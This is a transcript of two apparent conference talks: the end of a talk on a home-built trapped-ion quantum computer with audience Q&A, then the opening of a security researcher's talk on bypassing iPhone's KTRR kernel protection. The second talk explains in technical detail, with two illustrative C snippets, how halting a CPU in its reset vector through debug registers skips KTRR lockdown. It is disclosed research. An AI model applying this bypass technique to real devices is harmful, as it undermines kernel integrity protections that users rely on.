So as a conclusion, I'm trying to convince you that quantum computing and quantum computer devices are doable at home. So for cybersecurity, for so-called cybersecurity specialists: you need to adapt your own risk analysis, because it's doable at home. Just understand that. It's doable at home. All these quantum computers will be used for good, bad and ugly. Just remember, GCHQ has a prototype in a museum. It would have been fun if I could have seen the production quantum computer of GCHQ. Of course, a quantum computer is as hackable as a normal computer. So it's good news for the cybersecurity industry. But as a community, as hackers and makers at CCC, we need to be prepared to learn how to use them, how to hack them, how to program them. And at the software level, you just need to unlock your classical brain, the classical software brain. Because, if I may mention something at the software level, if you want to write some quantum code, you need to be able to write your code without any variables. You can't use variables in quantum code, because if you use variables, you make a copy of a quantum state, and making a copy of a quantum state is impossible. So you can't use them to make a variable or use a variable in your program. And you can't debug it, because if you debug it, you make a measurement, and if you make a measurement, you destroy the quantum state. So be prepared to unlock your brain to be able to write some code in the quantum world. But it's fun, sometimes. Thanks for your attention. And if you have any questions, it will be a pleasure. And as I'm French, I need to have a two-hour lunch time. Fantastique, merci beaucoup. We have a lot of time now for questions and answers. Line up at the microphones, please. And let's have a look if there's something from the Internet. Yes. I'm sorry. So please, first one from the Internet. First question, Internet. All right. The Internet's quite impressed by your talk. So that's just a statement. Everyone's very happy and pleased with your talk. Thanks to the Internet. All right. You have a few questions. The first one is: what properties should the element for the ion trap be chosen by? What? Sorry? So what are the properties that should be looked at for choosing the element for the ion trap? Which atom? I think the person asked, which atom? I used the calcium atom. Those atoms have a specific... because there is a lot of literature available, it's easy for me to understand how it works. Researchers have done all the work before. And I used this atom because there are some energy levels in this atom that are better protected from the environment. Okay, let's quickly switch to microphone number three. Thank you for your talk. My question is, what's the catch? If your design already exists in prototypes out there, and it seems so much easier than working with superconductors, then why isn't everyone already doing this? Why would someone choose superconducting and not ion trap technology? Is that your question? Correct. I don't know. Every time, there is this type of question: why do the big ones use superconducting technology and why are you using ion trap technology? Mainly the answer could be that the big ones come from the microelectronics domain. A superconducting qubit is made on a wafer. So it's usual for this type of company to be able to build this type of qubit. I think it's just a habit. Okay, thank you. Okay, microphone number two, please.
I'm very impressed, but okay, you mentioned that hobbyists can't really afford this, but a small company can. So just as a ballpark figure, I would like to ask the question: how much? All I have shown you here cost less than 15 kiloeuros of material for the moment. It is not for hobbyists, but for a small company. Okay, one question from the internet, signal angel, please. All right, the next question is: is your next step going to be singling out individual ions? Sorry? Can you repeat? Would your next step be singling out individual ions, as the next step in your quantum computer? We try to manipulate single ions; in fact, that's the goal, with lasers. With a laser, you shine on individual qubits. And with another laser, you make a link between the ions through the common motion of the ion chain. And you change the state of an individual ion. You transfer the state of this individual ion to the chain, which moves because the ions are electrically charged, so they repel each other. And this acts as a bus. And you transfer the quantum state information to a second ion to make a logic gate. So the goal, effectively, is to be able to manipulate one ion. We just shine a laser on the individual atoms. This is the goal. Okay, microphone number four, please. Google announced recently that they achieved quantum supremacy. What is your opinion on this topic? They've done a very good job with that. I think they showed the world for the first time that a quantum computer is able to do a calculation that a classical computer will never be able to do in the classical world. However, is that calculation useful? I'm not sure. Except for one thing: it's able to certify the randomness of a number. And that could be useful for the cybersecurity world. And, I think, for my company, I have no money to spend on marketing, so thanks to Google, because they showed the world the power of quantum computers. So it's cool for me. Okay, microphone number two, please. Hello. Thanks for the nice talk. I'm a materials scientist from currently-offline Gießen. Maybe you heard about our incident here. I was asking, what are your current problems with this? For example, I think I have too many questions to ask here now, but for example, we saw that you had some little pellets that were floating over your structure, but these are not the atoms that you're trying to confine so that you can make calculations. So you didn't tell us anything about how you are trying to achieve this. And what is your current state? I mean, could you even start some crude calculations on this already? No, not for the moment, because I need to shine the laser in the right direction. So for the moment, I'm building the optical setup. Okay, all right. Maybe there are some possibilities for how I could help you with your project. You're welcome. Because I have access, if I could ask the right people; I'm not in a position to promise something to you now. But for example, we have a Nanoscribe laser system, which is like a 3D printer, but you can build things at the nanometer scale. What is the cost to use it? The cost of the printer is around 300,000 euros. Oh. I'll take it. All right. Thanks for your help. Maybe after the talk, you can get in contact. Oh, yes. Okay. We'll have a dinner. Okay. All right. So two new friends, actually. Question from the internet, please. All right. So how many qubits is it possible to make in the garage? For the prototype, we think we are able to do some 10 to 15 qubits with one ion trap.
The goal is to change the ion trap. So we would have many, not as many as we want, but we could raise the number of qubits to 100 qubits. Okay. Microphone number three, please. Which calculations do you plan to perform on your quantum computer? I don't care. I build things. And software guys do their code. It's not my job. Okay. Microphone number four, please. There is somebody. Hello. So your optical setup reminded me of atomic force microscopes. Are you aware of what they are? Perhaps. They are essentially an optical setup with a nano- to microscale tip at the edge that rasters, that scans, across the surface and can detect nanoscale features. But the cool thing is that even though this is a scientific instrument, there are also open hardware designs for that. And maybe you can use the ideas from that for your optical setup. Because once again, you've got precise lasers, at least on the geometrical side. They have to be precisely aligned and everything. Thanks for the information. And of course, we use a lot of spectroscopy techniques in this type of computer. Okay. Do we have somebody over there at microphone number three? Did you consider optical quantum computers with entangled photons and such stuff? This was my first choice, in fact. However, as far as I know, and I'm not a physicist, it's difficult to make, not entanglement exactly, it's difficult to make photons talk to each other, they say. So it's a complicated way to do something with multiple qubits. But photonics is a good technology, because it also works at room temperature. But I prefer to have a vacuum chamber in my garage. Okay. Let's interrogate the Internet again. So you mentioned that you should not be doing measurements on the quantum computer. So have you tried doing any measurements on your prototype? Measurements of what? This is hard. I think the Internet cannot really reply now. So can we? The Internet is limited. I think we cannot really respond to that. If the person who asked the question wants to send me the question, I can answer it just after. Right. I think it was about the electric field. I know. I just don't make any measurements. I'm an engineer, and as I'm a good engineer, I just plug things in and see what happens. I have no idea of the electric field generated. No idea. Okay. Microphone number two, please. Hello. Thank you for the talk. So after you generate the vacuum in your vacuum chamber, how do you actually introduce the right number of ions, and how do you keep them in the place where you need to have them? It's a good question. In fact, we don't introduce the ions. We put a piece of calcium, a sort of calcium stone, in a sort of oven. It's just a tube. We send current through this tube. The tube heats the calcium. It makes some vapor, and we shine a laser on the vapor of neutral calcium atoms, and this creates the ions. And the ion is trapped, because it's now electrically charged and held by the electric field we make with the ion trap. So before closing all the vacuum viewports and all the nuts and bolts, we just put in a piece of calcium, neutral atoms. So everything is in the chamber before we turn on the quantum computer, or close the chamber. Okay, we stay at microphone number two. There is another one. Okay, second question. What you're describing is that you have a linear array of, right now, macroscopic particles. You will have a linear array of ions that are then coupled by kind of common vibrational modes, so they need to see each other's electric fields.
So I am wondering what the characteristic length scale between macroscopic particles versus ions would be, if you want to have some meaningful vibrational modes that don't immediately get drowned in external thermal noise. So if I understand the question correctly, you're asking me what the distance between the ions is? Yes, I mean you are pretty big compared to the IBM guys. If yes, I'm big. Yes, thank you. You're right. The typical distance we use between ions is a few microns. And if some researchers succeed in aligning 100 ions, then you have a chain of 100 ions multiplied by 5 to 10 microns between ions. This is the length. But I mean, on your substrate you have a fraction of a millimeter between the... It's because it's a prototype. Okay. You're right. I need to squeeze the design a little bit. I just need to buy a better CNC machine. Okay, we've got some questions from the internet again. All right, go. So this one is... this is more about the GCHQ exhibition. Is it still open? Do you know? Yes, I think so. I have a free ticket if you want. It's free. In fact, it's free. I guess people will contact you on Twitter for that. Yeah, make some tourist business or something. I can help. Everyone was impressed with your GCHQ hat. Okay, any more questions? How many people are working in your garage? There is me and sometimes one of my daughters, who is 10 years old. Pro team? Yeah, a big one. Okay, any more questions from the audience, from the internet? We have time. Okay, I'm going to close the session now. Thank you very much. Big applause again for Yann.
Quantum technologies are often over-hyped and shown only as a threat to cybersecurity... But they also offer some opportunities to enhance the cybersecurity landscape. As an example, you may know that a quantum computer will be able to break RSA keys, but quantum communication technologies can also provide a new way to securely exchange a cipher key. Moreover, with quantum networking technologies, communication eavesdropping is, by design, detectable, and thus this could lead to some good opportunities to use them to enhance cybersecurity. Some have even begun to build a quantum internet! We may also solve major security issues faced by cloud computation (privacy, confidentiality, etc.) via the use of "blind quantum computation" in the cloud. However, few people understand and explain how such machines and technologies work. Even fewer people are trying to build one. I'm one of these crazy people. In this talk, we aim to explain how this new type of much more powerful digital processing works and how we build our own quantum computer... without a PhD in quantum physics. We will describe our plan to build the quantum computer's hardware, hacker style. Through our own experiments, we will discuss our failures, our successes, and our progress around this challenging goal! Come see part of the hardware we are building at the moment. We use "trapped ion technology": we trap atoms to perform powerful calculation and computing tasks! Be prepared to unlock your quantum brain, as this new domain is really different from classical computation ;-) but it can enhance the cybersecurity world. Our goal: bring the knowledge that quantum computing works, explain how these machines make such powerful calculations at the hardware level, show that it is doable at home, and show that it will provide a new way to do secure computing and communication for the best of humanity. Proposal agenda: - Quantum computer 101 (one slide to understand the basics of quantum mechanics w/o FUD) - Why those quantum computers are so powerful - How to break things with quantum computers - How to improve the security level of modern networks with quantum technologies (networking, blind quantum computing for 100% privacy in the cloud, cipher key security, quantum internet & more) - How a quantum computer based on trapped ion technology works to do its magic, super powerful calculation (at the hardware level) - How we build our own quantum computer hardware at home (in our military-grade high-tech... garage!) with hacker style & open source software (contains a full video of the building of our quantum computer)
10.5446/53157 (DOI)
So, the next talk is called KTRW, the journey to build a debuggable iPhone. Hardware debugging of an iPhone is usually not possible. It's not possible with iOS devices, or it wasn't possible with iOS devices, and security research of the kernel is therefore quite a challenge. Well, with the Apple A10 chip, Apple implemented a thing called the kernel text read-only region, which is called KTRR for short. And Brandon Azad of Google Project Zero found a way to make a debuggable iPhone. And tonight he's going to tell us how he broke this KTRR and how he made a debuggable iPhone out of a regular production iPhone. Please give a warm round of applause to Brandon. Thanks. Awesome. Thank you very much. I'm very excited to be here. Thank you for showing up to my talk. And today I'm going to take you along my journey to build a capability that I've wanted to have for a very long time, a debuggable iPhone. So what exactly do I mean by a debuggable iPhone? Well, in order to kind of give you the context that you need to understand this, I'm going to need to talk about something which isn't frequently talked about in public. And it's a thing called dev-fused devices. Development-fused devices, prototype iPhones, these are all names for a similar concept, which is a type of device, a type of iPhone, that has extra debug capabilities built into it. So that's things like serial wire debug, JTAG, basically functionality that allows you to debug the phone at a very low level. For example, doing things like single-stepping through the bootloader, putting breakpoints in kernel mode and dumping registers, modifying registers, the sorts of things which would be very important for Apple engineers to be able to do, which are definitely not something Apple wants available on production iPhones distributed en masse. Now, in order to connect to these special types of iPhones' debug capabilities, you need a really special type of cable, usually called a probe. Here's an example of what's called a Kanzi cable. It has a special Lightning connector on one end, which has a special accessory ID burned into it, which allows it to communicate with the debug hardware on the phone. It has a controller, which is the chunky part in the middle, which is able to talk the debugging protocol, and it has a USB port on the other end, which you can connect to a laptop. On the laptop, you would typically run software. For example, there's this tool which you can find online called Astris. This is not software which Apple is willingly distributing. This is, as I understand it, leaked code, so it's not something which is, you know, sanctioned. But there are people who are able to obtain this software and use it to operate these debug probes. Here's an example of a screenshot where someone was able to use a Kong serial wire debug probe and connect it to a 32-bit dev-fused iPhone. And you can see register dumps. You can read and write memory. You can do all sorts of really low-level debugging on this iPhone. Now, I need to say I do not use dev-fused devices. I don't have access to these devices. I don't want to have access to these devices to do my work. That being said, it would really be incredibly useful to have such a low-level and powerful debug capability. So this is the motivation for my research project. I wanted to find some way to build a debug capability on a regular Apple-certified iPhone. Some way to build my own homebrewed dev phone.
And there were a number of different features that I wanted present in this homebrewed dev phone. I wanted the ability to patch kernel memory, and in particular the ability to patch the executable code in the kernel. For example, modifying existing instructions or injecting kernel shellcode, things like that. I wanted the ability to do your standard debugger features: set breakpoints, set watchpoints. The third item that I wanted this homebrewed dev phone to be capable of is I wanted it to use only standard off-the-shelf debuggers. I didn't want to use or to depend upon proprietary Apple software like Astris in order to operate. The next item is I wanted this homebrewed dev phone to be updateable. So I wanted to find some sort of low-level vulnerability such that I don't end up in the situation where I spend three months trying to create this debuggable phone, Apple patches whatever technique was being used in the next version of iOS, and now all of a sudden I'm no longer able to debug the latest version. The old capability would certainly still be somewhat useful: I can always diff the differences between subsequent versions of iOS to still get useful information from my debugger. But I would really love to be able to amortize the development cost of this debugger over many iterations of the iOS operating system, so keep this capability alive as long as possible. In practice, what this meant was I was going to be looking for perhaps a bootloader vulnerability, maybe some sort of hardware bug, something which was either difficult to patch, or, even if it was patched, was early enough in the boot process that it would still be possible to update the version of the iOS kernel running on the device. And the final thing is I wanted this dev phone to use only parts that you could obtain at an Apple store. So no specially fused CPUs, no special debug cables, nothing of that sort. Now I want to mention something really, really important that happened, probably the most important thing to happen to iOS security research in several years. And that is, pretty much just a couple of days before I was about to open source KTRW, axi0mX released a boot ROM exploit for all iPhones between the iPhone 4S and the iPhone X. Now the boot ROM exploit is actually strictly more powerful than the capability used in KTRW. Everything that I want to do in my debug phone is totally possible to do using the boot ROM exploit alone. So I want to tell you this just so that you're aware that many of the assumptions that I made going into this project really don't hold anymore. But they did hold at the time that I started this research. And I do expect that future debug capabilities and future research platforms on the iPhone will be based around the boot ROM exploit instead. So with that, let's talk about the main mitigation that makes kernel debugging on iPhone right now both really hard to do and also so important. And that's a mitigation called KTRR. If we look back at the list of requirements that I wanted in my homebrewed dev phone, the very first item on this list was I wanted the ability to patch kernel memory, and in particular to patch the executable code. Now normally on most systems, this isn't actually that difficult. Once you have the ability to read and write kernel memory, you can just modify page tables, make some page in memory read-write-execute, stuff your shellcode in there, and you're basically done. But on the iPhone, Apple has added a mitigation called KTRR.
And the idea is that we have a kernel cache in memory that's been put there by some sort of secure boot process. But once it's in memory and the system is running, Apple would really like a way to guarantee that the kernel cache gets locked down as much as possible, and any data in it which really does not need to be writable is never going to be modified. Basically, keep the guarantee that once an iPhone is booted, the code running in your kernel is exactly the code that was protected by and verified by the secure boot process. So there is some data in your kernel which does need to be writable. But there's also a bunch of data which really does not need to be writable. The most prominent example is the executable code. Clearly we don't want that to be changeable. But there's also a bunch of other pieces of data which are worth protecting. For example, you have strings, maybe format strings, virtual method tables, the page tables that are mapping the kernel cache itself into memory. All of these additional pieces of data, Apple would really like to have them be protected and not modifiable. And that's what KTRR does. It's going to lock down all of this data that we want to be read-only as the defenders. So as far as we know, KTRR stands for Kernel Text Read-only Region. So what KTRR boils down to is a very strong form of write-xor-execute protection. It's available in Apple A10 CPUs and later, and it provides two very strong guarantees. First is that all writes to memory inside of the region protected by KTRR will fail. This basically is what provides the lockdown guarantee that what was put there by the secure boot chain stays that way and can't be changed. But there's another part to it which is equally important. And that is that all instruction fetches from memory outside of the protected region are guaranteed to fail. This is what ensures that you can't put new executable code in the kernel; the only code that you're allowed to run is the kernel's own code. So in order to understand how this works in a little more detail, let's look at an oversimplified diagram of how the CPU works. So here we have the CPU cores. This is, for example, an A11 CPU with six cores. The little purple box in the bottom corner is the MMU. We have the highest level of the cache hierarchy, the L2 cache. Behind that is the memory controller, called the AMCC. And then this is connected to DRAM. Now the kernel lives contiguously in physical memory in DRAM. And this is what Apple wants to protect with KTRR. So the first step in order to lock down this region happens on the MMU. So let's zoom in to a single CPU core. What Apple has done, as far as I understand, is basically just add a couple of registers to the MMU that point to the beginning and ending address of the region to protect. What this allows us to do is the CPU core can now check whether each instruction it's about to execute violates the security guarantees we want from KTRR. So for example, let's say the CPU wants to issue a write to a physical address outside of the KTRR region. That's fine. We can write to that memory. So this will be allowed by the MMU and the write will go through. If, however, we try to issue a write to an address that points to inside the KTRR region, this violates the security properties of KTRR. And so the MMU will recognize this, it'll deny the write, and it'll cause that instruction to fault.
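In pseudo-C, the write-side check just described behaves conceptually like the snippet below. This is only a mental model of what the hardware does, not Apple's implementation; the bounds values and names are invented stand-ins for whatever the MMU actually stores.

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Invented stand-ins for the lockdown bounds the MMU was programmed with. */
static uint64_t ktrr_lower = 0x801000000;
static uint64_t ktrr_upper = 0x802000000;

/* Conceptual model of the MMU-side KTRR check for a write access:
 * any write whose physical address falls inside [lower, upper) faults. */
static bool ktrr_allows_write(uint64_t paddr) {
    return paddr < ktrr_lower || paddr >= ktrr_upper;
}

int main(void) {
    printf("write outside the region: %s\n",
           ktrr_allows_write(0x900000000) ? "allowed" : "fault");
    printf("write inside the region:  %s\n",
           ktrr_allows_write(0x801234000) ? "allowed" : "fault");
    return 0;
}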
Similarly, if the CPU tries to execute an instruction that is fetched from an address outside of the KTRR region, the MMU can recognize this and cause that instruction fetch to fault. So here's kind of the new picture of the CPU cores. We have a bunch of new registers in the MMU that have this KTRR protection built into them. However, this isn't the complete picture that we need in order to protect this memory. See, there are other devices that are connected to your system, all sorts of peripherals. This could be like a Wi-Fi chip, this could be like a USB stack, all sorts of things, any sort of hardware device which could issue DMA commands to your memory controller. So in order to protect against malicious peripherals DMAing over the protected region, we think that Apple has added registers to the memory controller as well that also point to the beginning and ending address of this lockdown region, such that any time some peripheral tries to DMA over the secure region, the memory controller sees that this DMA doesn't look valid and it will just discard the write. So this is kind of the picture of what the hardware now looks like in order to support KTRR. But this isn't actually the complete story either, because there's one specific edge case that needs to be properly handled, and that's when a CPU core goes to sleep for a little bit and then wakes up, what's called resetting. Any time a CPU core goes to sleep, it's going to power down registers, and in particular the MMU registers which store the KTRR bounds are going to lose their value and be reset to zero. So when the CPU wakes up from sleep, we need some way to reset those registers to point to the beginning and ending bounds of the lockdown region. So the reset vector is the first piece of code that gets executed when a CPU core wakes from sleep, and it does so with the MMU off. And what Apple has done is they've added code to the reset vector that basically just initializes those KTRR registers. The beginning and ending bounds are stored in these global variables. These variables, by the way, happen to lie inside of the locked down region, so they can't be modified. And once it reads those values into general purpose registers, it writes those bounds into special system registers that are used by the MMU to verify the KTRR security properties. So once this code executes, KTRR will be locked down on the MMU, and once again you can no longer execute memory that lies outside of the locked down region. So now that we have kind of a high level understanding of how KTRR works, let's look at how it's possible to break KTRR. And we'll start with a few historical examples. There are two historical instances of partial KTRR bypasses up till now, and the first one came out pretty soon after the KTRR mitigation was first introduced, and it was discovered by Luca Todesco, who's going to be giving a talk, I think, in this room tomorrow evening. So what Luca found was that Apple had left an instruction in the kernel cache that they didn't mean to leave executable, but it accidentally was. This was the MSR TTBR1 instruction, which sets the special TTBR1 register. This register stores the physical address of the root of the page table hierarchy, which means that if you're able to modify the value of this register, then you are able to supply your own custom page table hierarchy and therefore remap virtual memory onto new physical pages. So this is exactly what he did.
He just chose a remapping that placed the read-only regions of kernel memory onto new physical pages that contained a copy of the original kernel data. Now, it's important to note that KTRR was still actually fully initialized at the point at which you were able to execute this MSR instruction. So we can patch read-only data, but we can't execute new kernel code because KTRR lockdown on the MMU still did occur. So what the KTRR bypass in 10.1 basically achieved was limiting what was protected by KTRR down from the whole read-only region to only the executable code. But we get a whole bunch of new data in the kernel, which is now writable. The second KTRR bypass that was released was more of a bypass in spirit than in practice, but definitely a very important tool and a huge inspiration for my research. So back in iOS 11.1.2, Ian Beer found that the debugging functionality in the ARM specification was actually implemented in Apple's processors and could be used to implement a full-featured kernel debugger. So if you read the ARM architecture reference manual, you'll find that there is documentation on a feature called self-hosted debugging. Basically, the architecture provides a set of debug registers, which you can access via MSR instructions, and you can use these debugging registers to set breakpoints in kernel mode and also to, by implementing exception handling code in your exception handler, you can catch your own breakpoint exceptions and basically have the kernel implement its own debugger. For example, this might be somewhat analogous to using a KDP to debug a MacBook. Now, KDP has actually been removed from the iOS kernel that's distributed on production devices. However, the debugging registers that one might use to implement this are still present, still fully functional. And what Ian found was that he could use return-oriented programming to set the values of these registers correctly in order to implement a rather full-featured kernel debugger. He built something that works with LLDB, proved quite useful, and in particular, it was able to, by setting breakpoints, single-stepping, modify register values, execute existing instructions in the kernel in basically arbitrary order. So not native, like, arbitrary shellcode execution, but pretty darn close. So I started this project of trying to find some sort of KTRR bypass by looking in kind of the places that I thought would be more powerful, find more powerful KTRR bypasses, more likely to lead to something that would be persistent across multiple versions of iOS. Where I started was looking in iBoot. I was trying to find some sort of iBoot bug in the image for parsing and verification functions. I didn't end up finding anything there. Next, I kind of read through several sections of the ARM architecture manual, saw some interesting things about, you know, maybe, you know, if you have weird malformed TLB entry, if you have weird malformed page table entries, you could do something weird with the TLB. That didn't really end up yielding anything useful. I played around a little bit with, you know, I kind of misunderstood how KTRR worked a little bit, and I thought, you know, maybe there's a way to corrupt the L2 cache and then bypass KTRR that way. That didn't end up really working either. So I kind of, you know, tried a bunch of things, none of them really panned out, and I put this research on the back burner for a while. 
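To give a flavor of what programming these self-hosted debug registers involves, here is a hedged sketch, in C with inline assembly, of arming hardware breakpoint 0 on a kernel address. This is not Ian Beer's actual code, it would have to run at EL1, and the bit-field values reflect my reading of the ARMv8 debug chapter, so treat them as assumptions to verify.

#include <stdint.h>

/* Sketch: program the ARMv8 self-hosted debug registers to set a hardware
 * breakpoint on a kernel (EL1) address. Shown only to illustrate which
 * registers are involved; it will not run meaningfully in user space. */
void set_kernel_breakpoint(uint64_t address) {
    /* DBGBCR0_EL1: E=1 (enable), PMC=0b01 (match EL1), BAS=0b1111 (A64). */
    uint64_t bcr = (1u << 0) | (1u << 1) | (0xfu << 5);

    __asm__ volatile("msr oslar_el1, xzr");            /* clear the OS lock  */
    __asm__ volatile("msr dbgbvr0_el1, %0" :: "r"(address));
    __asm__ volatile("msr dbgbcr0_el1, %0" :: "r"(bcr));

    /* MDSCR_EL1: KDE (bit 13) allows debug exceptions at EL1,
     *            MDE (bit 15) enables breakpoint/watchpoint exceptions. */
    uint64_t mdscr;
    __asm__ volatile("mrs %0, mdscr_el1" : "=r"(mdscr));
    mdscr |= (1u << 13) | (1u << 15);
    __asm__ volatile("msr mdscr_el1, %0" :: "r"(mdscr));
    __asm__ volatile("isb");
}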
And it was actually while I was doing something totally unrelated that I happened to generate a kernel panic which reignited my interest. So I was playing around with interrupts, and I had managed to get a CPU core stuck in an infinite loop with interrupts disabled in kernel mode. And I got a panic message which said, you know, panic, watchdog timer timeout, CPU 1 has failed to respond. So kind of the exact thing you would expect when a CPU isn't responding because it's stuck burning CPU cycles in an infinite loop: eventually the system notices and panics because, you know, there's some significant problem here. But what really caught my attention about this panic message was something much earlier in it, where it says attempting to forcibly halt CPU 1. Now this was really interesting to me because, according to what I'd read from the ARM manual, there wasn't any standard way for one CPU core to halt a second CPU. Like, there are no MSRs that you can write to; I didn't really remember any way to accomplish this. So what I figured was there's probably some sort of proprietary interface going on here, where maybe there are special CPU control registers which are accessible via MMIO, and somehow XNU is trying to leverage those in order to halt the CPU. So this seemed pretty interesting. I've never seen something like this before. So I decided to pull up the engineering tools needed to figure out what was going on here. So I grepped through the XNU source code to try to find the string attempting to forcibly halt CPU. Pretty quickly I came to the function ml_dbgwrap_halt_cpu, which seemed to implement this functionality. It takes the index of which CPU you want to halt. So on a CPU with six cores, it would be the index zero through five. And the actual part which halts the CPU is just right down here, a couple of lines lower. So what this does is it reads a pointer to some volatile memory from a per-CPU data structure. The variable that stores the pointer to that memory is the DebugWrap register. And then the actual part of the code which halts the CPU simply consists of the single line where it writes some special debug halt value to the DebugWrap register. So this really strongly supports the idea that this is some special MMIO register. And when I was looking online to try to find references to this DebugWrap thing, I wasn't really getting any results. So it really strongly suggested that, yes, this is some sort of proprietary Apple-specific interface. The other thing that caught my attention was this reference to something called CoreSight. I remembered hearing CoreSight somewhere else before, but I didn't really know what it was, so I marked it as something to come back to. But what really caught my attention when I was looking through this file was a function just a few lines down called ml_dbgwrap_halt_cpu_with_state. This does basically the same thing as the other function, except in addition to halting a CPU, it also reads out the values of the registers on the CPU that was just halted. And the way that it does this is actually quite remarkable. So first off, you can see that there is another reference to this CoreSight thing. It says, ensure memory mapped CoreSight registers can be written. So clearly something with CoreSight is important here. Maybe it's the block of registers that contains this functionality. But the important part is this for loop right below, which iterates i over the indices of your general purpose registers.
What this code does is first it's going to generate the numerical opcode for the instruction which writes the value of general purpose register xi into the special system register DBGDTR. So this isn't an instruction which already exists in the kernel cache. It is just literally generating the numerical value of the opcode for that instruction. Next, it passes that opcode into ml_dbgwrap_stuff_instruction. And finally, it reads the value of the DBGDTR register and writes the value into the output buffer's xi field. So this is actually really interesting, because what it suggests is that ml_dbgwrap_stuff_instruction is somehow executing dynamically generated instructions. And this really flies in the face of the security model that KTRR is designed for. So KTRR is meant to ensure that the instructions in your kernel cache are the only ones that you're allowed to execute. But here, there's some sort of interface which seems to be able to execute any instruction you want on a halted CPU. So this is definitely really interesting. Now, just because there's code to do something in XNU doesn't actually mean that it necessarily works in practice. So I basically just decided to test whether this code actually runs. I pulled up an old kernel exploit that I'd written, and I basically just quickly put together something that would call the function ml_dbgwrap_halt_cpu_with_state, pass it an output buffer, and then dump the contents of that buffer. And what I found was that the output buffer really did look like a bunch of registers. So there's a bunch of stuff which was zero, which was kind of weird, but the value of CPSR does look correct. It actually looks like a CPU running in kernel mode. And the value of PC doesn't really look like a normal kernel virtual address. Those usually start with FFF. But it does really look like some sort of physical address, perhaps. And with a little bit of digging into this, I pretty quickly discovered that this is the physical address of an instruction in the reset vector. Now things are really, really getting interesting, because what this suggests is that we've managed to halt the execution of a CPU core while it's actually running the reset vector, and in particular before the MMU has been turned on. Now this is a really critical point in time for KTRR, because before the MMU has been turned on, KTRR is unable to protect the CPU from executing instructions outside of the locked down region. So of course what I really wanted to know was how do we use this capability in order to bypass KTRR? Well, it turns out that there's a more fundamental question that I needed to answer first, which was what exactly is this CoreSight thing anyway? It's really hard in practice, at least for me, to exploit something without knowing in a general sense how it works. And so I basically just searched for CoreSight in the ARM reference manual and came across a bunch of references to CoreSight in connection with something called the external debug interface. Now the external debug interface, it turns out, is pretty much just a different way of accessing the same functionality that Ian used in his self-hosted kernel debugger. So in the self-hosted debugging interface, you write to these debug registers using MSR instructions. The external debug interface provides a very similar functionality.
It's probably the same debugging hardware under the hood that you're driving, but the interface to access these registers is via MMIO rather than via executing MSR instructions. So this means that basically the functionality that is necessary to build a kernel debugger is still there. Even though the ROP gadgets that Ian used to activate it are taken away, the memory mapped interface still exists. And in fact, this isn't even the first time, not even close to the first time, that someone has tried to use debugging registers in an ARM processor in order to mount some sort of privileged attack. Zhenyu Ning and Fengwei Zhang presented an attack at MOSEC 2019, where they basically were able to leverage these same debugging registers on Android phones to break the protection of the secure world. So they were able to make one CPU core debug another CPU core, make that second CPU core execute instructions to enter the secure world at EL3, and then also make it execute instructions that would cause it to read and write memory in the secure world. So just to summarize the key concepts behind the external debug interface: it is an on-chip debugging architecture. It provides per-CPU debug registers, which are accessible via MMIO. The actual interface itself, how to use these registers, is really extensively documented in the ARM manual. It talks about what the names of all the registers are, their offsets, and how to program the registers in order to do things like set breakpoints and watchpoints. So I'm not going to go over all of that right here. But what I will say is that the external debug interface is certainly more than powerful enough to do any sort of kernel debugging that we might be interested in. So it's definitely capable of setting breakpoints and watchpoints, single-stepping execution, executing arbitrary instructions, poking at memory, all this sort of stuff. So the idea for my attack was: we have these debugging registers, we can do things like single-stepping, and we know that we can halt execution in the reset vector. So I basically decided I would try to use the external debug interface to single-step the reset vector, and then once the reset vector is about to execute the KTRR lockdown instructions, just jump over that piece of code so KTRR never gets initialized. So if we look at the reset vector, we'll just step through all of the first instructions, and then once we see that we've hit this conditional branch where we're just about to start doing the KTRR register initialization, we'll just set X17 to zero and jump over the KTRR code altogether. Now, this is a nice idea, but we don't actually have all the tools necessary yet in order to carry it out. We know that we can halt the CPU, and we know that we can execute arbitrary instructions on it and do things like modify the values in registers. But we haven't yet found the ability to resume execution on the CPU after it's been halted. So if we set a breakpoint on the reset vector, for example, that's nice, but it's not going to be of much use if we can't continue execution after that point. Furthermore, there's another somewhat more subtle issue, which is that we're using one CPU to hijack another CPU as it resets. But CPU resets happen all the time. Every time a CPU core is idle for a couple of seconds, it'll eventually just do a reset as it powers down and powers back up again. So we're going to have to do this KTRR hijack.
We're going to need to modify the execution of the reset vector and skip the KTRR initialization every single time that a CPU core resets, unless we can find some way to disable the core from resetting. So I didn't know how to do either of these two things. So I just decided to play around with that original proprietary register that I found earlier. So the XNU source code documents a couple of the bits. I think it documents two of the bits in that register. The remaining bits are undocumented. So I figured, you know, might as well set some bits, clear some bits, see what happens, see if I learn anything interesting. And I kid you not, by sheer dumb luck, it happened that that register contained exactly the pieces of functionality we needed to pull this hijack together. So bit 30 actually will clear the halt and it'll allow the CPU to resume executing. And bit 26 will keep the CPU powered up so that it doesn't subsequently reset and then we have to re-hijack the reset vector. So basically the attack that we described before works perfectly well once we have this new functionality. We just make sure that once we hit this branch, we skip over the KTR register lockdown code and then these registers never get written to, KTRR is never initialized on the system, and kernel memory becomes executable. So what this looks like is first we have KTRR enabled. Once we do this hijack, KTRR is disabled on MMU and now any page in kernel memory could now potentially be executed. Got a little bit more to go. Thank you. So now that we've found a way to break KTRR, I want to talk about how to build an actual debugger on top of this because I found it to be a quite non-trivial challenge. So there were a number of steps involved in this process and actually in many of them I encountered issues that I thought would be basically insurmountable. So the first step in the process is we need to remap the kernel because even though we've enabled the ability to execute arbitrary kernel shellcode, we don't yet have the ability to patch kernel memory. Next we need to figure out some way to load a kernel extension. We need to make sure that we're properly handling interrupts because we're going to be disabling, or sorry, we're going to be halting CPUs and once a CPU is halted it of course can't service interrupts anymore. We're going to need to establish some sort of communication channel between the kernel extension running in your iPhone and your laptop running LLDB. And finally we need to implement a GDB stub to process the packet sent by LLDB and to drive the debugging hardware. So at the point at which we bypass KTRR, we have the ability to execute arbitrary kernel shellcode but we don't yet have the ability to patch kernel memory. The reason for this is that even though we've disabled KTRR on the MMUs, it's still fully enabled on the memory controller. So even though we can execute code outside of the read-only region, the read-only region's physical pages are still fully protected and we can't modify them persistently. So this is actually kind of problematic for us. We really do need to modify the page table permissions in order to make the kernel extensions memory executable. And the root of the page table hierarchy lies inside of the KTRR region, which is still protected. So the solution to this is to basically do exactly the same thing that Luca did in the 10.1.1 bypass, which is to remap the kernel onto fresh writable pages and set TTBR1 to point to the new page tables instead. 
